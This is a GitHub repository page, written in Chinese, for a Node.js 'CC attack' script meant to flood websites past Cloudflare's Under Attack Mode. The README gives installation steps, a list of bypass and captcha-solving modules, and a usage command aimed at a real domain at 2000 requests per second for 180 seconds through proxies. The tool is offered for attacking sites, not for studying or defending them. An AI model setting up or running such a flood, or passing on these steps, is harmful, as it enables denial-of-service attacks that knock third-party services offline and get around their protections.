Skip to content

nodejs cc攻击脚本 针对不带验证的CF-uam

Notifications You must be signed in to change notification settings

piokto/https-bypass

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

需要到HTTP或SOCKS5代理

自行解决

部署nodejs

使用git安装nvm

git clone git://github.com/creationix/nvm.git ~/nvm

下载完成后加入系统环境

source ~/.bashrc

nvm安装nodejs

nvm install 16.15.0

如需要安装另外的版本

nvm install 版本号

安装

git clone https://github.com/piokto/https-bypass.git
cd https-bypass

安装npm模块

npm i requests
npm i https-proxy-agent
npm i crypto-random-string
npm i events
npm i fs
npm i net
npm i cloudscraper
npm i request
npm i hcaptcha-solver
npm i randomstring
npm i cluster
npm i cloudflare-bypasser
example:
node https-bypass.js GET 10 https://baidu.com 180 2000
使用GET 运行10个node进程攻击目标180秒 每秒2000次访问

About

nodejs cc攻击脚本 针对不带验证的CF-uam

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published